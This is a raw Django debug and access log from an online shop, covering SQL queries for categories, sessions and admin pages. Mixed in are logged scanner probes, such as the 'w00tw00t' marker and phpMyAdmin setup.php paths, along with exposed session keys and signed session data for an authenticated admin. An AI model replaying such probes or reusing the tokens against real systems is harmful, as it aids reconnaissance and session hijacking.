"shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 18:24:05,272 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 18:24:05,274 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 18:24:05,277 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 18:24:05,279 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 18:24:05,283 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 18:24:05,285 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 18:24:05,288 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 18:24:05,292 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 18:24:05,295 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 18:24:05] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [16/Dec/2019 18:32:08] "GET / HTTP/1.0" 302 0 [16/Dec/2019 18:37:11] "GET / HTTP/1.0" 302 0 [16/Dec/2019 18:42:13] "GET / HTTP/1.0" 302 0 [16/Dec/2019 18:49:21] "GET / HTTP/1.0" 302 0 [16/Dec/2019 18:55:35] "GET / HTTP/1.0" 302 0 [16/Dec/2019 19:05:03] "GET / HTTP/1.0" 302 0 [16/Dec/2019 19:10:05] "GET / HTTP/1.0" 302 0 [16/Dec/2019 19:15:08] "GET / HTTP/1.0" 302 0 [16/Dec/2019 19:20:11] "GET / HTTP/1.0" 302 0 [16/Dec/2019 19:25:14] "GET / HTTP/1.0" 302 0 [16/Dec/2019 19:30:16] "GET / HTTP/1.0" 302 0 [16/Dec/2019 19:35:20] "GET / HTTP/1.0" 302 0 [16/Dec/2019 19:41:49] "GET / HTTP/1.0" 302 0 [16/Dec/2019 19:44:23] "GET / HTTP/1.0" 302 0 [16/Dec/2019 19:46:52] "GET / HTTP/1.0" 302 0 [16/Dec/2019 19:48:52] "GET / HTTP/1.0" 302 0 [16/Dec/2019 19:51:55] "GET / HTTP/1.0" 302 0 [16/Dec/2019 19:56:57] "GET / HTTP/1.0" 302 0 Not Found: /w00tw00t.at.blackhats.romanian.anti-sec:) [16/Dec/2019 19:57:48] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.0" 404 6716 Not Found: /phpMyAdmin/scripts/setup.php [16/Dec/2019 19:57:48] "GET /phpMyAdmin/scripts/setup.php HTTP/1.0" 404 6677 Not Found: /phpmyadmin/scripts/setup.php [16/Dec/2019 19:57:48] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 6677 Not Found: /pma/scripts/setup.php [16/Dec/2019 19:57:48] "GET /pma/scripts/setup.php HTTP/1.0" 404 6656 Not Found: /myadmin/scripts/setup.php [16/Dec/2019 19:57:49] "GET /myadmin/scripts/setup.php HTTP/1.0" 404 6668 Not Found: /MyAdmin/scripts/setup.php [16/Dec/2019 19:57:49] "GET /MyAdmin/scripts/setup.php HTTP/1.0" 404 6668 [16/Dec/2019 20:05:02] "GET / HTTP/1.0" 302 0 [16/Dec/2019 20:06:40] "GET / HTTP/1.0" 302 0 [16/Dec/2019 20:12:08] "GET / HTTP/1.0" 302 0 [16/Dec/2019 20:17:11] "GET / HTTP/1.0" 302 0 [16/Dec/2019 20:22:14] "GET / HTTP/1.0" 302 0 [16/Dec/2019 20:29:12] "GET / HTTP/1.0" 302 0 [16/Dec/2019 20:34:15] "GET / HTTP/1.0" 302 0 [16/Dec/2019 20:39:18] "GET / HTTP/1.0" 302 0 [16/Dec/2019 20:44:21] "GET / HTTP/1.0" 302 0 [16/Dec/2019 20:49:24] "GET / HTTP/1.0" 302 0 [16/Dec/2019 20:54:27] "GET / HTTP/1.0" 302 0 [16/Dec/2019 20:58:52] "GET / HTTP/1.0" 302 0 [16/Dec/2019 21:00:01] "GET / HTTP/1.0" 302 0 [16/Dec/2019 21:05:03] "GET / HTTP/1.0" 302 0 [16/Dec/2019 21:06:04] "HEAD / HTTP/1.0" 302 0 DEBUG 2019-12-16 21:06:04,894 utils 20136 140506667599616 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '3f2uszaldbc0hb8ju3yaacme0oazzkgg' LIMIT 1; args=('3f2uszaldbc0hb8ju3yaacme0oazzkgg',) DEBUG 2019-12-16 21:06:04,896 utils 20136 140506667599616 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('3f2uszaldbc0hb8ju3yaacme0oazzkgg', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-30T21:06:04.894916+00:00'::timestamptz); args=('3f2uszaldbc0hb8ju3yaacme0oazzkgg', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 30, 21, 6, 4, 894916, tzinfo=)) [16/Dec/2019 21:06:04] "HEAD /login/?next=/ HTTP/1.0" 200 1786 [16/Dec/2019 21:06:04] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 21:06:05,158 utils 20136 140506667599616 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'skqatv8z6ap7tioeicnvu84qga0sjtwo' LIMIT 1; args=('skqatv8z6ap7tioeicnvu84qga0sjtwo',) DEBUG 2019-12-16 21:06:05,160 utils 20136 140506667599616 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('skqatv8z6ap7tioeicnvu84qga0sjtwo', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-30T21:06:05.158694+00:00'::timestamptz); args=('skqatv8z6ap7tioeicnvu84qga0sjtwo', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 30, 21, 6, 5, 158694, tzinfo=)) [16/Dec/2019 21:06:05] "GET /login/?next=/ HTTP/1.0" 200 1786 [16/Dec/2019 21:10:06] "GET / HTTP/1.0" 302 0 [16/Dec/2019 21:15:09] "GET / HTTP/1.0" 302 0 [16/Dec/2019 21:21:19] "GET / HTTP/1.0" 302 0 [16/Dec/2019 21:26:36] "GET / HTTP/1.0" 302 0 [16/Dec/2019 21:31:38] "GET / HTTP/1.0" 302 0 [16/Dec/2019 21:36:41] "GET / HTTP/1.0" 302 0 [16/Dec/2019 21:41:44] "GET / HTTP/1.0" 302 0 [16/Dec/2019 21:45:01] "GET /whm-server-status HTTP/1.0" 301 0 [16/Dec/2019 21:46:47] "GET / HTTP/1.0" 302 0 [16/Dec/2019 21:51:55] "GET / HTTP/1.0" 302 0 [16/Dec/2019 21:56:57] "GET / HTTP/1.0" 302 0 [16/Dec/2019 22:04:07] "GET / HTTP/1.0" 302 0 [16/Dec/2019 22:10:04] "GET / HTTP/1.0" 302 0 [16/Dec/2019 22:15:06] "GET / HTTP/1.0" 302 0 [16/Dec/2019 22:15:06] "GET / HTTP/1.0" 302 0 [16/Dec/2019 22:16:34] "GET / HTTP/1.0" 302 0 [16/Dec/2019 22:20:09] "GET / HTTP/1.0" 302 0 [16/Dec/2019 22:24:35] "GET / HTTP/1.0" 302 0 [16/Dec/2019 22:25:12] "GET / HTTP/1.0" 302 0 [16/Dec/2019 22:31:57] "GET / HTTP/1.0" 302 0 [16/Dec/2019 22:37:19] "GET / HTTP/1.0" 302 0 [16/Dec/2019 22:42:22] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [16/Dec/2019 22:43:40] "GET /robots.txt HTTP/1.0" 404 6624 Not Found: /User/User_Favorite.asp [16/Dec/2019 22:43:42] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=174 HTTP/1.0" 404 6705 Not Found: /newslist.asp [16/Dec/2019 22:43:44] "GET /newslist.asp?type=4&id=1275 HTTP/1.0" 404 6649 [16/Dec/2019 22:47:25] "GET / HTTP/1.0" 302 0 [16/Dec/2019 22:52:27] "GET / HTTP/1.0" 302 0 [16/Dec/2019 22:52:50] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 22:52:50,946 utils 20136 140506667599616 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'y11f6fbvxqhceyv18z5fejxiklty4cny' LIMIT 1; args=('y11f6fbvxqhceyv18z5fejxiklty4cny',) DEBUG 2019-12-16 22:52:50,949 utils 20136 140506667599616 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('y11f6fbvxqhceyv18z5fejxiklty4cny', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-30T22:52:50.947467+00:00'::timestamptz); args=('y11f6fbvxqhceyv18z5fejxiklty4cny', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 30, 22, 52, 50, 947467, tzinfo=)) [16/Dec/2019 22:52:50] "GET /login/?next=/ HTTP/1.0" 200 1786 [16/Dec/2019 23:00:02] "GET / HTTP/1.0" 302 0 [16/Dec/2019 23:05:03] "GET / HTTP/1.0" 302 0 [16/Dec/2019 23:13:55] "GET / HTTP/1.0" 302 0 [16/Dec/2019 23:14:10] "GET / HTTP/1.0" 302 0 [16/Dec/2019 23:19:13] "GET / HTTP/1.0" 302 0 [16/Dec/2019 23:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [16/Dec/2019 23:27:14] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [16/Dec/2019 23:29:05] "HEAD /robots.txt HTTP/1.0" 404 6627 [16/Dec/2019 23:32:17] "GET / HTTP/1.0" 302 0 [16/Dec/2019 23:39:06] "GET / HTTP/1.0" 302 0 [16/Dec/2019 23:44:08] "GET / HTTP/1.0" 302 0 [16/Dec/2019 23:51:35] "GET / HTTP/1.0" 302 0 [16/Dec/2019 23:57:22] "GET / HTTP/1.0" 302 0 [17/Dec/2019 00:05:02] "GET / HTTP/1.0" 302 0 [17/Dec/2019 00:10:05] "GET / HTTP/1.0" 302 0 [17/Dec/2019 00:15:54] "GET / HTTP/1.0" 302 0 [17/Dec/2019 00:20:57] "GET / HTTP/1.0" 302 0 [17/Dec/2019 00:25:59] "GET / HTTP/1.0" 302 0 [17/Dec/2019 00:35:52] "GET / HTTP/1.0" 302 0 [17/Dec/2019 00:40:54] "GET / HTTP/1.0" 302 0 [17/Dec/2019 00:47:13] "GET / HTTP/1.0" 302 0 [17/Dec/2019 00:52:17] "GET / HTTP/1.0" 302 0 [17/Dec/2019 00:58:55] "GET / HTTP/1.0" 302 0 [17/Dec/2019 01:05:03] "GET / HTTP/1.0" 302 0 [17/Dec/2019 01:14:45] "GET / HTTP/1.0" 302 0 [17/Dec/2019 01:19:47] "GET / HTTP/1.0" 302 0 [17/Dec/2019 01:24:50] "GET / HTTP/1.0" 302 0 [17/Dec/2019 01:29:52] "GET / HTTP/1.0" 302 0 [17/Dec/2019 01:34:55] "GET / HTTP/1.0" 302 0 [17/Dec/2019 01:39:58] "GET / HTTP/1.0" 302 0 [17/Dec/2019 01:45:00] "GET / HTTP/1.0" 302 0 [17/Dec/2019 01:50:01] "GET /whm-server-status HTTP/1.0" 301 0 [17/Dec/2019 01:50:03] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [17/Dec/2019 01:53:17] "GET /robots.txt HTTP/1.0" 404 6623 [17/Dec/2019 01:53:17] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-17 01:53:18,226 utils 20136 140506667599616 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '25g1ugsopa9oiq2k7v3elol4c032vcbl' LIMIT 1; args=('25g1ugsopa9oiq2k7v3elol4c032vcbl',) DEBUG 2019-12-17 01:53:18,228 utils 20136 140506667599616 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('25g1ugsopa9oiq2k7v3elol4c032vcbl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-31T01:53:18.226653+00:00'::timestamptz); args=('25g1ugsopa9oiq2k7v3elol4c032vcbl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 31, 1, 53, 18, 226653, tzinfo=)) [17/Dec/2019 01:53:18] "GET /login/?next=/ HTTP/1.0" 200 1786 [17/Dec/2019 01:55:05] "GET / HTTP/1.0" 302 0 [17/Dec/2019 01:58:08] "GET / HTTP/1.0" 302 0 [17/Dec/2019 02:00:20] "GET / HTTP/1.0" 302 0 [17/Dec/2019 02:10:04] "GET / HTTP/1.0" 302 0 [17/Dec/2019 02:15:06] "GET / HTTP/1.0" 302 0 [17/Dec/2019 02:20:09] "GET / HTTP/1.0" 302 0 [17/Dec/2019 02:25:11] "GET / HTTP/1.0" 302 0 [17/Dec/2019 02:34:24] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-17 02:34:24,311 utils 20136 140506667599616 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '23eioqmpas7emqhx6ok94h0vez30a5dx' LIMIT 1; args=('23eioqmpas7emqhx6ok94h0vez30a5dx',) DEBUG 2019-12-17 02:34:24,313 utils 20136 140506667599616 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('23eioqmpas7emqhx6ok94h0vez30a5dx', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-31T02:34:24.312437+00:00'::timestamptz); args=('23eioqmpas7emqhx6ok94h0vez30a5dx', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 31, 2, 34, 24, 312437, tzinfo=)) [17/Dec/2019 02:34:24] "GET /login/?next=/ HTTP/1.0" 200 1786 [17/Dec/2019 02:36:37] "GET / HTTP/1.0" 302 0 [17/Dec/2019 02:43:24] "GET / HTTP/1.0" 302 0 [17/Dec/2019 02:48:27] "GET / HTTP/1.0" 302 0 [17/Dec/2019 02:57:46] "GET / HTTP/1.0" 302 0 [17/Dec/2019 03:03:57] "GET / HTTP/1.0" 302 0 [17/Dec/2019 03:09:03] "GET / HTTP/1.0" 302 0 [17/Dec/2019 03:10:44] "GET / HTTP/1.0" 302 0 [17/Dec/2019 03:15:47] "GET / HTTP/1.0" 302 0 [17/Dec/2019 03:20:49] "GET / HTTP/1.0" 302 0 [17/Dec/2019 03:25:52] "GET / HTTP/1.0" 302 0 [17/Dec/2019 03:30:54] "GET / HTTP/1.0" 302 0 [17/Dec/2019 03:35:57] "GET / HTTP/1.0" 302 0 [17/Dec/2019 03:42:08] "GET / HTTP/1.0" 302 0 [17/Dec/2019 03:47:10] "GET / HTTP/1.0" 302 0 [17/Dec/2019 03:52:13] "GET / HTTP/1.0" 302 0 [17/Dec/2019 03:57:16] "GET / HTTP/1.0" 302 0 [17/Dec/2019 04:05:03] "GET / HTTP/1.0" 302 0 [17/Dec/2019 04:10:06] "GET / HTTP/1.0" 302 0 [17/Dec/2019 04:15:08] "GET / HTTP/1.0" 302 0 [17/Dec/2019 04:21:39] "GET / HTTP/1.0" 302 0 [17/Dec/2019 04:30:09] "GET / HTTP/1.0" 302 0 [17/Dec/2019 04:35:12] "GET / HTTP/1.0" 302 0 [17/Dec/2019 04:39:03] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [17/Dec/2019 04:40:31] "GET /robots.txt HTTP/1.0" 404 6624 Not Found: /User/User_Favorite.asp [17/Dec/2019 04:40:32] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=175 HTTP/1.0" 404 6705 Not Found: /newslist.asp [17/Dec/2019 04:40:34] "GET /newslist.asp?type=4&id=1307 HTTP/1.0" 404 6649 [17/Dec/2019 04:41:46] "GET / HTTP/1.0" 302 0 [17/Dec/2019 04:44:33] "GET / HTTP/1.0" 302 0 [17/Dec/2019 04:49:35] "GET / HTTP/1.0" 302 0 [17/Dec/2019 04:54:38] "GET / HTTP/1.0" 302 0 [17/Dec/2019 05:00:02] "GET / HTTP/1.0" 302 0 [17/Dec/2019 05:05:03] "GET / HTTP/1.0" 302 0 [17/Dec/2019 05:10:05] "GET / HTTP/1.0" 302 0 [17/Dec/2019 05:15:08] "GET / HTTP/1.0" 302 0 [17/Dec/2019 05:18:06] "GET / HTTP/1.0" 302 0 [17/Dec/2019 05:20:11] "GET / HTTP/1.0" 302 0 [17/Dec/2019 05:25:13] "GET / HTTP/1.0" 302 0 [17/Dec/2019 05:31:11] "GET / HTTP/1.0" 302 0 [17/Dec/2019 05:36:13] "GET / HTTP/1.0" 302 0 [17/Dec/2019 05:41:16] "GET / HTTP/1.0" 302 0 [17/Dec/2019 05:46:18] "GET / HTTP/1.0" 302 0 [17/Dec/2019 05:51:21] "GET / HTTP/1.0" 302 0 [17/Dec/2019 05:56:23] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt DEBUG 2019-12-17 05:58:11,774 utils 20136 140506667599616 (0.018) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-17T05:58:11.741127+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 17, 5, 58, 11, 741127, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [17/Dec/2019 05:58:11] "GET /robots.txt HTTP/1.0" 404 6626 DEBUG 2019-12-17 05:58:11,778 utils 20136 140506667599616 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-17 05:58:11,782 utils 20136 140506667599616 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."id" = 2; args=(2,) DEBUG 2019-12-17 05:58:11,882 utils 20136 140506667599616 (0.005) DECLARE "_django_curs_140506667599616_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-17 05:58:12,015 utils 20136 140506667599616 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-31T05:58:12.011823+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 31, 5, 58, 12, 11823, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [17/Dec/2019 05:58:12] "GET /shop/product/2/change/ HTTP/1.0" 200 11326 DEBUG 2019-12-17 05:58:13,134 utils 20136 140506667599616 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-17T05:58:13.124719+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 17, 5, 58, 13, 124719, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-17 05:58:13,138 utils 20136 140506667599616 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [17/Dec/2019 05:58:13] "GET /jsi18n/ HTTP/1.0" 200 3223 [17/Dec/2019 05:58:14] "GET /static/admin/img/tooltag-arrowright.svg HTTP/1.0" 200 280 Not Found: /favicon.ico [17/Dec/2019 05:58:17] "GET /favicon.ico HTTP/1.0" 404 6629 DEBUG 2019-12-17 05:58:32,330 utils 20136 140506667599616 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-17T05:58:32.321740+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 17, 5, 58, 32, 321740, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-17 05:58:32,333 utils 20136 140506667599616 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-17 05:58:32,336 utils 20136 140506667599616 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-17 05:58:32,337 utils 20136 140506667599616 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-17 05:58:32,343 utils 20136 140506667599616 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() Not Found: /robots.txt [17/Dec/2019 05:58:32] "GET /robots.txt HTTP/1.0" 404 6626 DEBUG 2019-12-17 05:58:32,559 utils 20136 140506667599616 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-31T05:58:32.557605+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 31, 5, 58, 32, 557605, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [17/Dec/2019 05:58:32] "GET /shop/category/ HTTP/1.0" 200 15719 DEBUG 2019-12-17 05:58:33,913 utils 20136 140506667599616 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-17T05:58:33.904259+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 17, 5, 58, 33, 904259, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-17 05:58:33,915 utils 20136 140506667599616 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [17/Dec/2019 05:58:33] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-17 05:58:38,274 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE 